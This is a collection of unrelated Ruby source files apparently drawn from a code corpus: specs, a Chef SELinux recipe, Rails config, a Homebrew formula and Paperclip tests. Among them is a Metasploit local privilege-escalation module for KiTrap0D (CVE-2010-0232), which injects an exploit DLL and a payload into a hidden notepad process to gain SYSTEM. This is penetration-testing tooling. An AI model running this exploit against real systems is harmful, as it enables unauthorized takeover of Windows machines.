expect(storage_key).to eq("0x4ee617ba653a1b87095c394f5d411283c63c595452a3c75489ef352677ad51fad82c12285b5d4551f88e8f6e7eb52b8101000000754faa9acf0378f8c3543d9f132d85bc02000000")
storage_name = 'DoubleMap2'
storage_key = SubstrateClient::Helper.generate_storage_key(module_name, storage_name, [param1, param2], 'blake2_128_concat', 'twox64_concat')
expect(storage_key).to eq("0x4ee617ba653a1b87095c394f5d411283fdf2e24b59506516f72546464dd82f88d82c12285b5d4551f88e8f6e7eb52b81010000009eb2dcce60f37a2702000000")
end
end
| 45.923077 | 179 | 0.80268 |
7a1365a007c6e4cd6cd280a1ef49874eaf25ed4c | 4,155 | #
# Cookbook Name:: selinux
# Recipe:: default
#
# Copyright 2011, Chef Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
include_recipe 'selinux::_common'
# semanage is not installed by default; we need to manually add it.
package "policycoreutils-python"
selinux_state "SELinux #{node['selinux']['state'].capitalize}" do
action node['selinux']['state'].downcase.to_sym
end
node['selinux']['booleans'].each do |boolean, value|
value = SELinuxServiceHelpers.selinux_bool(value)
unless value.nil?
script "boolean_#{boolean}" do
interpreter "bash"
code "setsebool -P #{boolean} #{value}"
not_if "getsebool #{boolean} |egrep -q \" #{value}\"$"
end
end
end
############################################
# Add all the fcontexts that are not
# already in semanage. Since adding
# them individually is painfully slow,
# we collect a list of all required
# fcontexts first, and then import them
# all at once.
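# (For reference, each generated line fed to `semanage -i -` below has the
# shape "fcontext -a -t <selinux_type> '<path_regex>'", for example
# "fcontext -a -t httpd_sys_content_t '/srv/www(/.*)?'" -- a hypothetical
# type/path pair, not one read from this node's attributes.)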
# Get the current fcontexts. Throw out header lines and the like
cmd = Mixlib::ShellOut.new("/usr/sbin/semanage fcontext -ln | egrep '.+:.+:.+:.+'")
cmd.run_command
cmdout = cmd.stdout.lines
current_fcontexts = Hash[cmdout.map{ |line|
lineparts = line.split(' ')
context = lineparts.first
types = lineparts.last
result = nil
if not types.nil? then
# note that the fields in between may contain spaces, and thus may have
# been improperly split. We are only interested in the first and last
# field, though.
u,r,t,s = types.split(':')
if not t.nil? then
result = [context, t]
end
end
result
}
]
fcontexts = node['selinux']['fcontexts'].select { |fc,type| current_fcontexts[fc] != type }.map do |fc,type|
# special case handling: if the fc is /usr/lib(64)?/nagios/plugins/negate we need to use
# 'regular file' instead of 'all files' because that context already exists with the wrong
# value.
if fc == "/usr/lib(64)?/nagios/plugins/negate" then
# The syntax for the import command has changed in RH 7
if node.platform_version.to_f >= 7.0 then
"fcontext -a -f f -t #{type} '#{fc}'"
else
"fcontext -a -f 'regular file' -t #{type} '#{fc}'"
end
else
# "fcontext -a -f 'all files' -t #{type} '#{fc}'"
"fcontext -a -t #{type} '#{fc}'"
end
end
############################################
# Process all ports, similar to the fcontexts
#
# SEManage returns ports as context - protocol - port list
# The port list is a comma/space-separate list that contains
# either individual ports, or ranges of ports.
# For instance:
# zebra_port_t udp 2600-2604, 2606
# TODO: properly process port ranges
cmd = Mixlib::ShellOut.new("/usr/sbin/semanage port -ln")
cmd.run_command
cmdout = cmd.stdout.lines
current_ports = Hash.new
cmdout.each{ |line|
context,proto,portslist = line.split(' ',3)
ports = portslist.split(',').map{ |p| p.strip() }
current_ports[proto] = Hash.new if current_ports[proto].nil?
ports.each do |port|
current_ports[proto][port] = context
end
}
# For each port that needs an selinux context configured,
# check if it is already included in currports - if not,
# add a line to be imported by semanage.
node['selinux']['ports'].each do |proto,protoports|
ports = protoports.select{ |port,context|
current_ports[proto][port.to_s] != context rescue true
}.map{ |port,context|
"port -a -t #{context} -p #{proto} #{port}"
}
fcontexts = fcontexts | ports
end
if fcontexts.length > 0 then
importdata = fcontexts.join("\n")
script "Import selinux configs" do
interpreter "bash"
code "echo \"#{importdata}\" | semanage -i -"
end
end
| 31.240602 | 108 | 0.672443 |
acd90d9b8ad17455cdfbb0682d5696b9975ddd55 | 390 | module Mutant
class Mutator
class Node
# Mutator for super without parentheses
class ZSuper < self
handle(:zsuper)
private
# Emit mutations
#
# @return [undefined]
#
# @api private
#
def dispatch
emit_singletons
end
end # ZSuper
end # Node
end # Mutator
end # Mutant
| 15 | 45 | 0.517949 |
21d30cdd86e3ee44922d16c8779045bf5e72dc3c | 347 | class ResultDetail < StudyRelationship
def attribs
{
:recruitment_details => xml.xpath('//clinical_results').xpath('participant_flow').xpath('recruitment_details').children.text,
:pre_assignment_details => xml.xpath('//clinical_results').xpath('participant_flow').xpath('pre_assignment_details').children.text,
}
end
end
| 31.545455 | 137 | 0.737752 |
e866cdfbeec4c957bfe4fd540185bd3798af965f | 956 | # typed: true
module KubeDSL
class FieldRes
include StringHelpers
include RbiHelpers
attr_reader :name, :type, :required
alias_method :required?, :required
def initialize(name, type, required)
@name = name
@type = type
@required = required
end
def fields_to_ruby(_inflector)
["value_field :#{ruby_safe_name}"]
end
def fields_to_rbi(inflector)
[
"sig { params(val: T.nilable(#{rbi_type_for(@type)})).returns(#{rbi_type_for(@type)}) }",
"def #{ruby_safe_name}(val = nil); end\n"
]
end
def validations(_inflector)
[].tap do |result|
result << "validates :#{ruby_safe_name}, field: { format: :#{type} }, presence: #{required? ? 'true' : 'false'}"
end
end
def serialize_call(_inflector)
ruby_safe_name
end
private
def ruby_safe_name
@ruby_safe_name ||= unkeywordify(underscore(name))
end
end
end
| 21.244444 | 120 | 0.614017 |
1dab5f6c8a3ca2c2c91d7894c8eb77d55ddf5625 | 222 | require 'rails_helper'
RSpec.describe Friendship, type: :model do
describe 'Like' do
it { should belong_to(:sender) }
it { should belong_to(:receiver) }
it { should validate_presence_of(:status) }
end
end
| 22.2 | 47 | 0.698198 |
91b3e2fd23dae5da908c6d607ef4d76badfbc816 | 386 | class CreateUsers < ActiveRecord::Migration[5.2]
def change
create_table :users do |t|
t.string :username
t.string :phone_number
t.string :password_digest
t.string :openid
t.string :nickname
t.integer :sex
t.string :province
t.string :country
t.string :headimgurl
t.string :unionid
t.timestamps
end
end
end
| 20.315789 | 48 | 0.629534 |
6163f6b01882e4c0e5db245366fc852f16fcd024 | 521 | require 'formula'
class Sslscan < Formula
homepage 'https://github.com/rbsec/sslscan'
url 'https://github.com/rbsec/sslscan/archive/1.11.0-rbsec.tar.gz'
sha1 'f5b3600b33181097f0afd49a3d1e894948da3d9c'
version '1.11.0'
depends_on "openssl"
# Fix compilation and statically link against OpenSSL 1.0.2 rather than 1.0.1
#patch :DATA
def install
ENV.deparallelize
system "make"
bin.install "sslscan"
man1.install "sslscan.1"
end
test do
system "#{bin}/sslscan"
end
end
__END__
| 19.296296 | 79 | 0.708253 |
0155954db3e2bbb9cd517af5bae44ba9a154cf4c | 1,783 | # -*- encoding: utf-8 -*-
# stub: net-ftp 0.1.1 ruby lib
Gem::Specification.new do |s|
s.name = "net-ftp".freeze
s.version = "0.1.1"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.metadata = { "homepage_uri" => "https://github.com/ruby/net-ftp", "source_code_uri" => "https://github.com/ruby/net-ftp" } if s.respond_to? :metadata=
s.require_paths = ["lib".freeze]
s.authors = ["Shugo Maeda".freeze]
s.bindir = "exe".freeze
s.date = "2021-04-06"
s.description = "Support for the File Transfer Protocol.".freeze
s.email = ["[email protected]".freeze]
s.files = ["net/ftp.rb".freeze, "net/http.rb".freeze, "net/http/backward.rb".freeze, "net/http/exceptions.rb".freeze, "net/http/generic_request.rb".freeze, "net/http/header.rb".freeze, "net/http/proxy_delta.rb".freeze, "net/http/request.rb".freeze, "net/http/requests.rb".freeze, "net/http/response.rb".freeze, "net/http/responses.rb".freeze, "net/http/status.rb".freeze, "net/https.rb".freeze, "net/imap.rb".freeze, "net/pop.rb".freeze, "net/protocol.rb".freeze, "net/smtp.rb".freeze]
s.homepage = "https://github.com/ruby/net-ftp".freeze
s.licenses = ["Ruby".freeze, "BSD-2-Clause".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 2.3.0".freeze)
s.rubygems_version = "3.2.15".freeze
s.summary = "Support for the File Transfer Protocol.".freeze
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_runtime_dependency(%q<net-protocol>.freeze, [">= 0"])
s.add_runtime_dependency(%q<time>.freeze, [">= 0"])
else
s.add_dependency(%q<net-protocol>.freeze, [">= 0"])
s.add_dependency(%q<time>.freeze, [">= 0"])
end
end
| 50.942857 | 487 | 0.689288 |
79380fe289cc5e9e826d753a569ef1c523e60e1d | 1,252 | # This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
# movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }])
# Character.create(name: 'Luke', movie: movies.first)
Hotel.create({
name: 'K-9 Resort Daycare & Luxury Hotel',
location: 'New Jersey, USA',
activities: 'Swimming, Doggie Ice Cream Socials, Frisbee'
})
Hotel.create({
name: 'Jet Pet Resort',
location: 'Vancouver, Canada',
activities: 'Private dog walks, luxury pet spa offering doggy massages and manicures'
})
Hotel.create({
name: 'The Wags Club',
location: 'Georgia, USA',
activities: 'Swimming, Doggy Dances with music, pet concierge services'
})
Hotel.create({
name: 'Red Dog Atlanta',
location: 'Georgia, USA',
activities: 'Grooming and Spa services, Dog PJ and Ugly Sweater contests, Dog Tacos'
})
Hotel.create({
name: 'We Love Wags',
location: 'Seattle, USA',
activities: 'Dog park with pool, Doggy socials, Doggy treats stations'
})
| 29.116279 | 111 | 0.64377 |
ff2e19b5b37af685d217f60a1231c0b6f3f28dc4 | 233 | class ApplicationController < ActionController::Base
protect_from_forgery with: :exception
http_basic_authenticate_with name: "user", password: "user", except: [:index, :show]
def index
@articles = Article.all
end
end
| 23.3 | 86 | 0.746781 |
188bfbe73a305708acd9747f6d60f0f8be7bf4e8 | 3,567 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'msf/core/exploit/exe'
require 'rex'
class MetasploitModule < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info={})
super( update_info( info,
'Name' => 'Windows SYSTEM Escalation via KiTrap0D',
'Description' => %q{
This module will create a new session with SYSTEM privileges via the
KiTrap0D exlpoit by Tavis Ormandy. If the session is use is already
elevated then the exploit will not run. The module relies on kitrap0d.x86.dll,
and is not supported on x64 editions of Windows.
},
'License' => MSF_LICENSE,
'Author' => [
'Tavis Ormandy', # Original researcher and exploit creator
'HD Moore', # Port of Tavis' code to meterpreter module
'Pusscat', # Port of Tavis' code to meterpreter module
'OJ Reeves' # Port of meterpreter code to a windows local exploit
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' => [
[ 'Windows 2K SP4 - Windows 7 (x86)', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ]
],
'DefaultTarget' => 0,
'References' => [
[ 'CVE', '2010-0232' ],
[ 'MSB', 'MS10-015' ],
[ 'EDB', '11199' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2010/Jan/341' ]
],
'DisclosureDate'=> "Jan 19 2010"
))
end
def check
# Validate platform architecture
if sysinfo["Architecture"] =~ /x64|WOW64/i
return Exploit::CheckCode::Safe
end
# Validate OS version
winver = sysinfo["OS"]
unless winver =~ /Windows 2000|Windows XP|Windows Vista|Windows 2003|Windows 2008|Windows 7/
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Detected
end
def exploit
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
if check == Exploit::CheckCode::Safe
fail_with(Failure::NotVulnerable, "Exploit not available on this system.")
end
print_status("Launching notepad to host the exploit...")
process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true})
host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
library_path = ::File.join(Msf::Config.data_directory, "exploits",
"CVE-2010-0232", "kitrap0d.x86.dll")
library_path = ::File.expand_path(library_path)
print_status("Injecting exploit into #{process.pid} ...")
exploit_mem, offset = inject_dll_into_process(host_process, library_path)
print_status("Exploit injected. Injecting payload into #{process.pid}...")
payload_mem = inject_into_process(host_process, payload.encoded)
# invoke the exploit, passing in the address of the payload that
# we want invoked on successful exploitation.
print_status("Payload injected. Executing exploit...")
host_process.thread.create(exploit_mem + offset, payload_mem)
print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
end
end
| 35.316832 | 98 | 0.652369 |
ff662afe5e019df4f25c36ca76f7310bda62b8ce | 665 | require "rails_helper"
RSpec.feature "Bookmarking a post" do
let(:user) { create(:user) }
let(:post) { create(:post, user: user) }
scenario "signed-in user bookmarks a post successfully", js: true do
sign_in user
visit post_path(post)
within("#main-post") do
click_on "Bookmark"
expect(page).to have_button "Unbookmark"
click_on "Unbookmark"
expect(page).to have_button "Bookmark"
end
end
scenario "non-logged in user cannot bookmark a post", js: true do
visit post_path(post)
within("#main-post") do
click_on "Bookmark"
end
expect(page).to have_content("Sign in with Facebook")
end
end
| 24.62963 | 70 | 0.669173 |
ed70a045393d86f96151730d733f1746ea642fa9 | 1,658 | # Where our application lives. $RAILS_ROOT is defined in our Dockerfile.
app_path = ENV['RAILS_ROOT']
# Set the server's working directory
working_directory app_path
# Define where Unicorn should write its PID file
pid "/var/tmp/pids/unicorn.pid"
# Bind Unicorn to the container's default route, at port 3000
listen "0.0.0.0:3000"
# Define the number of workers Unicorn should spin up.
# A new Rails app just needs one. You would scale this
# higher in the future once your app starts getting traffic.
# See https://unicorn.bogomips.org/TUNING.html
worker_processes 1
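# (If you scale this later, one common pattern -- shown here only as a
# hedged sketch, "WEB_CONCURRENCY" is not a variable this repo sets -- is:
#   worker_processes Integer(ENV.fetch("WEB_CONCURRENCY", 3))
# )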
# Make sure we use the correct Gemfile on restarts
before_exec do |server|
ENV['BUNDLE_GEMFILE'] = "#{app_path}/Gemfile"
end
# Speeds up your workers.
# See https://unicorn.bogomips.org/TUNING.html
preload_app true
#
# Below we define how our workers should be spun up.
# See https://unicorn.bogomips.org/Unicorn/Configurator.html
#
before_fork do |server, worker|
# the following is highly recommended for Rails + "preload_app true"
# as there's no need for the master process to hold a connection
if defined?(ActiveRecord::Base)
ActiveRecord::Base.connection.disconnect!
end
# Before forking, kill the master process that belongs to the .oldbin PID.
# This enables 0 downtime deploys.
old_pid = "#{server.config[:pid]}.oldbin"
if File.exists?(old_pid) && server.pid != old_pid
begin
Process.kill("QUIT", File.read(old_pid).to_i)
rescue Errno::ENOENT, Errno::ESRCH
# someone else did our job for us
end
end
end
after_fork do |server, worker|
if defined?(ActiveRecord::Base)
ActiveRecord::Base.establish_connection
end
end
| 29.087719 | 76 | 0.739445 |
ffe1b1f82f05c560be867c536bd7805dca567e70 | 3,540 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = 'http://assets.example.com'
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
# Mount Action Cable outside main process or domain
# config.action_cable.mount_path = nil
# config.action_cable.url = 'wss://example.com/cable'
# config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
config.force_ssl = true
# Use the lowest log level to ensure availability of diagnostic information
# when problems arise.
config.log_level = :debug
# Prepend all log lines with the following tags.
config.log_tags = [ :request_id ]
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Use a real queuing backend for Active Job (and separate queues per environment)
# config.active_job.queue_adapter = :resque
# config.active_job.queue_name_prefix = "beacon-web-api_#{Rails.env}"
config.action_mailer.perform_caching = false
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Use a different logger for distributed setups.
# require 'syslog/logger'
# config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')
if ENV["RAILS_LOG_TO_STDOUT"].present?
logger = ActiveSupport::Logger.new(STDOUT)
logger.formatter = config.log_formatter
config.logger = ActiveSupport::TaggedLogging.new(logger)
end
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
config.paperclip_defaults = {
storage: :s3,
s3_region: ENV["AWS_REGION"],
s3_credentials: {
s3_host_name: ENV["S3_HOSTNAME"],
bucket: "beaconoid",
access_key_id: ENV["ACCESS_KEY_ID"],
secret_access_key: ENV["SECRET_ACCESS_KEY"]
}
}
end
| 39.333333 | 100 | 0.748023 |
7a93d0a9620f6ded8202e4d05e8d738e985e5014 | 1,947 | class CenterIm < Formula
desc "Text-mode multi-protocol instant messaging client"
homepage "http://www.centerim.org/index.php/Main_Page"
url "http://www.centerim.org/download/releases/centerim-4.22.10.tar.gz"
sha256 "93ce15eb9c834a4939b5aa0846d5c6023ec2953214daf8dc26c85ceaa4413f6e"
revision 1
bottle do
revision 1
sha256 "315556554c3e5b972b0d99145fd6d0971837c2bbd981b849ca89e7a9c069335b" => :el_capitan
sha256 "5a51f0130fcd601aeed50ae6f66008aaa0ec96f6ac3e7bc828b627f04b46b9f2" => :yosemite
sha256 "673992c76745d9509dd32e71c964946018584db447b37d02a21f332b508c619d" => :mavericks
sha256 "934ab216ab1f6eb9033cfb1bbbe720f2a7fa5190eb64c245d2140694c832a965" => :mountain_lion
end
depends_on "pkg-config" => :build
depends_on "gettext"
depends_on "openssl"
depends_on "jpeg" => :optional
# Fix build with clang; 4.22.10 is an outdated release and 5.0 is a rewrite,
# so this is not reported upstream
patch :DATA
patch :p0 do
url "https://raw.githubusercontent.com/Homebrew/formula-patches/677cb38/center-im/patch-libjabber_jconn.c.diff"
sha256 "ed8d10075c23c7dec2a782214cb53be05b11c04e617350f6f559f3c3bf803cfe"
end
def install
system "./configure", "--disable-dependency-tracking",
"--prefix=#{prefix}",
"--disable-msn",
"--with-openssl=#{Formula["openssl"].opt_prefix}"
system "make", "install"
# /bin/gawk does not exist on OS X
inreplace bin/"cimformathistory", "/bin/gawk", "/usr/bin/awk"
end
test do
assert_match /trillian/, shell_output("#{bin}/cimconv")
end
end
__END__
diff --git a/libicq2000/libicq2000/sigslot.h b/libicq2000/libicq2000/sigslot.h
index b7509c0..024774f 100644
--- a/libicq2000/libicq2000/sigslot.h
+++ b/libicq2000/libicq2000/sigslot.h
@@ -82,6 +82,7 @@
#ifndef SIGSLOT_H__
#define SIGSLOT_H__
+#include <cstdlib>
#include <set>
#include <list>
| 33 | 115 | 0.724191 |
ab41f7c600527d8ae82488ebf7b855399841a26e | 2,377 | =begin
#Scubawhere API Documentation
#This is the documentation for scubawhere's RMS API. This API is only to be used by authorized parties with valid auth tokens. [Learn about scubawhere](http://www.scubawhere.com) to become an authorized consumer of our API
OpenAPI spec version: 1.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for SwaggerClient::Session
# Automatically generated by swagger-codegen (github.com/swagger-api/swagger-codegen)
# Please update as you see appropriate
describe 'Session' do
before do
# run before each test
@instance = SwaggerClient::Session.new
end
after do
# run after each test
end
describe 'test an instance of Session' do
it 'should create an instance of Session' do
expect(@instance).to be_instance_of(SwaggerClient::Session)
end
end
describe 'test attribute "id"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "trip"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "start"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "boat"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "timetable_id"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 30.474359 | 224 | 0.737905 |
b93c266927c72ee863a2cd9ac856bcd303935977 | 678 | # frozen_string_literal: true
module Zoho
module People
class Attendance
attr_reader :check_in, :check_out, :email
def initialize(email:, check_in:, check_out:)
raise ArgumentError, 'check_in must be DateTime instance' unless check_in.is_a?(DateTime)
raise ArgumentError, 'check_out must be DateTime instance' unless check_out.is_a?(DateTime)
@email = email
@check_in = check_in
@check_out = check_out
end
def to_s
"attendance from #{format(check_in)} to #{format(check_out)}"
end
private
def format(datetime)
datetime.strftime('%F@%H:%M')
end
end
end
end
| 23.37931 | 99 | 0.644543 |
870ae8d69baf2adbf6858fa20481212e4f17b59c | 543 | # frozen_string_literal: true
# typed: strict
class Other::OtherClass
Foo::Bar::Exists.hello # This ref still works
Foo::Bar::Exists.helloXX
# ^^^^^^^ error: Method `helloXX` does not exist on `T.class_of(Foo::Bar::Exists)`
Foo::Bar::NotDefined
# ^^^^^^^^^^^^^^^^^^^^ error: Unable to resolve constant `NotDefined`
Foo::Bar::NotDefined.xxx
# ^^^^^^^^^^^^^^^^^^^^ error: Unable to resolve constant `NotDefined`
Foo::Bar::NotDefined::Deeper
# ^^^^^^^^^^^^^^^^^^^^ error: Unable to resolve constant `NotDefined`
end
| 31.941176 | 99 | 0.618785 |
1ab6a01b20a5353dc0bd885db181951d1001307e | 1,209 | require "erb"
module YmTags::Tag
include ERB::Util
def self.included(base)
base.scope :contexts, lambda {|contexts| base.joins(:taggings).where(["taggings.context IN (?)", [*contexts]]).group('tags.id')}
base.scope :most_used, lambda { base.joins(:taggings).select("tags.*, COUNT(taggings.id) as tag_count").order('tag_count DESC').group('tags.id') }
base.scope :for_post_target, lambda {|target| base.joins(:taggings).joins("INNER JOIN posts ON (taggable_id = posts.id AND taggable_type = 'Post')").where(["posts.target_type = ? AND posts.target_id = ?", target.class.to_s, target.id])}
base.send(:extend, ClassMethods)
end
module ClassMethods
def tag_list_options(contexts, resource, tags = nil)
tags ||= self.contexts(contexts)
resource_tags = [*contexts].collect {|context| resource.send("#{context.to_s.singularize}_list")}
(tags.collect(&:name) + resource_tags.flatten).uniq.sort
end
end
def to_s
if ActsAsTaggableOn::TagList.force_parameterize
name.gsub("-", " ")
else
name
end
end
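  # Dots are percent-encoded by hand below, presumably so a dot in a tag name is
  # not mistaken for a format extension when the value is used in a URL.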
def to_param
url_encoded_name = name_was.blank? ? u(name) : u(name_was)
url_encoded_name.gsub(".", "%2E")
end
end | 36.636364 | 240 | 0.674938 |
e288a8f084513e0e50f97007383b8b47e7c32c7e | 8,183 | require './test/helper'
class GeometryTest < Test::Unit::TestCase
context "Paperclip::Geometry" do
should "correctly report its given dimensions" do
assert @geo = Paperclip::Geometry.new(1024, 768)
assert_equal 1024, @geo.width
assert_equal 768, @geo.height
end
should "set height to 0 if height dimension is missing" do
assert @geo = Paperclip::Geometry.new(1024)
assert_equal 1024, @geo.width
assert_equal 0, @geo.height
end
should "set width to 0 if width dimension is missing" do
assert @geo = Paperclip::Geometry.new(nil, 768)
assert_equal 0, @geo.width
assert_equal 768, @geo.height
end
should "be generated from a WxH-formatted string" do
assert @geo = Paperclip::Geometry.parse("800x600")
assert_equal 800, @geo.width
assert_equal 600, @geo.height
end
should "be generated from a xH-formatted string" do
assert @geo = Paperclip::Geometry.parse("x600")
assert_equal 0, @geo.width
assert_equal 600, @geo.height
end
should "be generated from a Wx-formatted string" do
assert @geo = Paperclip::Geometry.parse("800x")
assert_equal 800, @geo.width
assert_equal 0, @geo.height
end
should "be generated from a W-formatted string" do
assert @geo = Paperclip::Geometry.parse("800")
assert_equal 800, @geo.width
assert_equal 0, @geo.height
end
should "ensure the modifier is nil if not present" do
assert @geo = Paperclip::Geometry.parse("123x456")
assert_nil @geo.modifier
end
should "treat x and X the same in geometries" do
@lower = Paperclip::Geometry.parse("123x456")
@upper = Paperclip::Geometry.parse("123X456")
assert_equal 123, @lower.width
assert_equal 123, @upper.width
assert_equal 456, @lower.height
assert_equal 456, @upper.height
end
['>', '<', '#', '@', '%', '^', '!', nil].each do |mod|
should "ensure the modifier #{mod.inspect} is preserved" do
assert @geo = Paperclip::Geometry.parse("123x456#{mod}")
assert_equal mod, @geo.modifier
assert_equal "123x456#{mod}", @geo.to_s
end
end
['>', '<', '#', '@', '%', '^', '!', nil].each do |mod|
should "ensure the modifier #{mod.inspect} is preserved with no height" do
assert @geo = Paperclip::Geometry.parse("123x#{mod}")
assert_equal mod, @geo.modifier
assert_equal "123#{mod}", @geo.to_s
end
end
should "make sure the modifier gets passed during transformation_to" do
assert @src = Paperclip::Geometry.parse("123x456")
assert @dst = Paperclip::Geometry.parse("123x456>")
assert_equal ["123x456>", nil], @src.transformation_to(@dst)
end
should "generate correct ImageMagick formatting string for W-formatted string" do
assert @geo = Paperclip::Geometry.parse("800")
assert_equal "800", @geo.to_s
end
should "generate correct ImageMagick formatting string for Wx-formatted string" do
assert @geo = Paperclip::Geometry.parse("800x")
assert_equal "800", @geo.to_s
end
should "generate correct ImageMagick formatting string for xH-formatted string" do
assert @geo = Paperclip::Geometry.parse("x600")
assert_equal "x600", @geo.to_s
end
should "generate correct ImageMagick formatting string for WxH-formatted string" do
assert @geo = Paperclip::Geometry.parse("800x600")
assert_equal "800x600", @geo.to_s
end
should "be generated from a file" do
file = fixture_file("5k.png")
file = File.new(file, 'rb')
assert_nothing_raised{ @geo = Paperclip::Geometry.from_file(file) }
assert @geo.height > 0
assert @geo.width > 0
end
should "be generated from a file path" do
file = fixture_file("5k.png")
assert_nothing_raised{ @geo = Paperclip::Geometry.from_file(file) }
assert @geo.height > 0
assert @geo.width > 0
end
should "not generate from a bad file" do
file = "/home/This File Does Not Exist.omg"
assert_raise(Paperclip::Errors::NotIdentifiedByImageMagickError){ @geo = Paperclip::Geometry.from_file(file) }
end
should "not generate from a blank filename" do
file = ""
assert_raise(Paperclip::Errors::NotIdentifiedByImageMagickError){ @geo = Paperclip::Geometry.from_file(file) }
end
should "not generate from a nil file" do
file = nil
assert_raise(Paperclip::Errors::NotIdentifiedByImageMagickError){ @geo = Paperclip::Geometry.from_file(file) }
end
should "not generate from a file with no path" do
file = mock("file", :path => "")
file.stubs(:respond_to?).with(:path).returns(true)
assert_raise(Paperclip::Errors::NotIdentifiedByImageMagickError){ @geo = Paperclip::Geometry.from_file(file) }
end
should "let us know when a command isn't found versus a processing error" do
old_path = ENV['PATH']
begin
ENV['PATH'] = ''
assert_raises(Paperclip::Errors::CommandNotFoundError) do
file = fixture_file("5k.png")
@geo = Paperclip::Geometry.from_file(file)
end
ensure
ENV['PATH'] = old_path
end
end
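    # Each row: [description, width, height, vertical?, horizontal?, square?,
    #            larger dimension, smaller dimension, aspect ratio]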
[['vertical', 900, 1440, true, false, false, 1440, 900, 0.625],
['horizontal', 1024, 768, false, true, false, 1024, 768, 1.3333],
['square', 100, 100, false, false, true, 100, 100, 1]].each do |args|
context "performing calculations on a #{args[0]} viewport" do
setup do
@geo = Paperclip::Geometry.new(args[1], args[2])
end
should "#{args[3] ? "" : "not"} be vertical" do
assert_equal args[3], @geo.vertical?
end
should "#{args[4] ? "" : "not"} be horizontal" do
assert_equal args[4], @geo.horizontal?
end
should "#{args[5] ? "" : "not"} be square" do
assert_equal args[5], @geo.square?
end
should "report that #{args[6]} is the larger dimension" do
assert_equal args[6], @geo.larger
end
should "report that #{args[7]} is the smaller dimension" do
assert_equal args[7], @geo.smaller
end
should "have an aspect ratio of #{args[8]}" do
assert_in_delta args[8], @geo.aspect, 0.0001
end
end
end
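    # Each row: [source dimensions, destination dimensions,
    #            expected scale geometry, expected crop geometry]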
[[ [1000, 100], [64, 64], "x64", "64x64+288+0" ],
[ [100, 1000], [50, 950], "x950", "50x950+22+0" ],
   [ [100, 1000], [50, 25],   "50x",   "50x25+0+237" ]].each do |args|
context "of #{args[0].inspect} and given a Geometry #{args[1].inspect} and sent transform_to" do
setup do
@geo = Paperclip::Geometry.new(*args[0])
@dst = Paperclip::Geometry.new(*args[1])
